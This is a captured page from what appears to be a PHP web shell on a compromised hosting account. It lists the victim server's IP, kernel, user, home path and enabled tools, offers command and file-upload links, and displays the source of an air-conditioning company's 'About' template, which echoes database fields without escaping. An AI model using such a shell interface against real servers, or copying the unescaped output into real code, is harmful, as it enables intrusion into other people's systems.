Server IP : 103.53.40.154 / Your IP : 3.17.155.142 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/comfortaircon.co/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!--=========================== Start About ===========================--> <section class="about_area section_padding"> <div class="container"> <div class="row"> <?php $sql7 = "SELECT * FROM `tbl_about` WHERE a_id=1"; $run7 = mysqli_query($db,$sql7) or die("Query Not run"); $data7 = mysqli_fetch_assoc($run7); ?> <div class="col-md-6"> <div class="about_image about-image__updated" style="background: url(admin/images/<?php echo $data7['about_img']?>) center center no-repeat;"></div> </div><!--end .col-md-6--> <div class="col-md-6"> <div class="about_details"> <div class="hero-title-with-shape"> <h4 style="color:#01395e" class="heading_with_border">Welcome to Comfort Aircon</h4> <h1 style="color:#01395e">Air conditioning repair and installation company</h1> </div><!--end .hero-title-with-shape--> <?php echo $data7['about_desc']?> <a href="#" class="btn-yellow">LEARN MORE</a> </div><!--end .about_details--> </div><!--end .col-md-6--> </div><!--end .row--> </div><!--end .container--> </section><!--end .about_area--> <!--=========================== End About ===========================-->